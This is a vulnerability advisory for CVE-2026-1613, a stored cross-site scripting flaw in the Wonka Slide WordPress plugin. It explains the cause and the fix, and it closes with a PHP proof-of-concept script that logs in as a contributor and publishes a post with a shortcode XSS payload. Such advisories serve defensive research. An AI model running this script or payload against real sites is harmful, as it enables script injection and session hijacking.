Atomic Edge analysis of CVE-2026-1613 (metadata-based):
The Wonka Slide plugin for WordPress, versions 1.3.3 and earlier, contains an authenticated stored cross-site scripting vulnerability. The flaw exists within the plugin’s `list_class` shortcode handler. Attackers with contributor-level or higher permissions can inject arbitrary JavaScript into posts or pages, which executes when a user views the compromised content. The CVSS score of 6.4 reflects a medium-severity risk with scope change, indicating the attack can impact users beyond the vulnerable component.
Atomic Edge research identifies the root cause as insufficient input sanitization and output escaping on user-supplied shortcode attributes. The CWE-79 classification confirms a classic cross-site scripting pattern. The vulnerability description explicitly states the issue is within the `list_class` shortcode. Without access to source code, this conclusion is inferred from the CWE and the public description. The plugin fails to properly neutralize user input before it is embedded into the page output.
Exploitation requires an authenticated user with at least the ‘contributor’ role. The attacker creates or edits a post, inserting the vulnerable shortcode with a malicious payload in one of its attributes. For example, `[list_class class=” onmouseover=alert(document.domain) ]` could be used. Upon saving and publishing the post, the payload is stored in the database. The script executes in the browser of any user who visits the page containing this shortcode. The attack vector is the WordPress post editor, targeting the shortcode’s attribute parsing mechanism.
Effective remediation requires implementing proper output escaping. The plugin should use WordPress core functions like `esc_attr()` when echoing shortcode attribute values within HTML tags. Input sanitization for shortcode attributes, using functions like `sanitize_html_class()`, would provide an additional layer of defense. A patch must ensure all user-controlled data rendered in the browser is contextually escaped.
Successful exploitation leads to stored XSS. Attackers can perform actions within the victim’s browser session, such as stealing session cookies, redirecting users to malicious sites, or performing actions on behalf of the user. For administrators, this could facilitate site takeover. The impact is confined to the browser context but can be severe depending on the privileges of the compromised user.
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-1613 - Wonka Slide <= 1.3.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
<?php
/**
* Proof of Concept for CVE-2026-1613.
* This script simulates an authenticated Contributor creating a post with a malicious shortcode.
* Assumptions:
* 1. The target site has the Wonka Slide plugin (<=1.3.3) installed.
* 2. Valid contributor credentials are available.
* 3. The 'list_class' shortcode accepts and unsafely outputs the 'class' attribute.
*/
$target_url = 'http://vulnerable-wordpress-site.local'; // CONFIGURE THIS
$username = 'contributor_user'; // CONFIGURE THIS
$password = 'contributor_pass'; // CONFIGURE THIS
// Payload: A basic JavaScript alert demonstrating XSS.
// The payload is placed in the 'class' attribute of the 'list_class' shortcode.
$malicious_shortcode = '[list_class class="" onmouseover=alert(AtomicEdge)//"]Your list content here[/list_class]';
$post_title = 'Test Post with XSS - Atomic Edge Research';
$post_content = "This post contains a malicious shortcode for research purposes.nn" . $malicious_shortcode;
// Initialize cURL session for login
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
'log' => $username,
'pwd' => $password,
'wp-submit' => 'Log In',
'redirect_to' => $target_url . '/wp-admin/',
'testcookie' => '1'
)));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt'); // Save session cookies
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$login_response = curl_exec($ch);
// Check for a successful login by looking for a dashboard indicator or checking HTTP code.
// A more robust check would parse the response for 'wp-admin' links.
if (strpos($login_response, 'wp-admin') === false) {
die('Login likely failed. Check credentials.');
}
// Step 2: Create a new post with the malicious shortcode.
// Contributor users typically use the '/wp-admin/post-new.php' endpoint.
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/post-new.php');
curl_setopt($ch, CURLOPT_HTTPGET, true); // First, GET the page to retrieve the nonce.
$post_page = curl_exec($ch);
// Extract the nonce for creating a post. The nonce field name is '_wpnonce' and is often in a meta tag or hidden input.
// This is a simplified extraction; a real script would parse the HTML more carefully.
preg_match('/name="_wpnonce" value="([a-f0-9]+)"/', $post_page, $nonce_matches);
$nonce = $nonce_matches[1] ?? '';
if (empty($nonce)) {
die('Could not extract nonce for post creation.');
}
// Now POST to create the post.
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/post.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
'post_title' => $post_title,
'content' => $post_content,
'post_type' => 'post',
'publish' => 'Publish', // Contributors submit for review; Admins can publish directly.
'_wpnonce' => $nonce,
'_wp_http_referer' => $target_url . '/wp-admin/post-new.php',
'action' => 'editpost'
)));
$create_response = curl_exec($ch);
// Check for success. A redirect to the new post or an edit screen indicates success.
if (curl_getinfo($ch, CURLINFO_HTTP_CODE) == 200 && strpos($create_response, $post_title) !== false) {
echo "Proof of Concept executed. Check the newly created post for the shortcode.n";
echo "Visit the post and interact with the list element to trigger the XSS payload.n";
} else {
echo "Post creation may have failed. Check permissions or nonce validity.n";
}
curl_close($ch);
?>
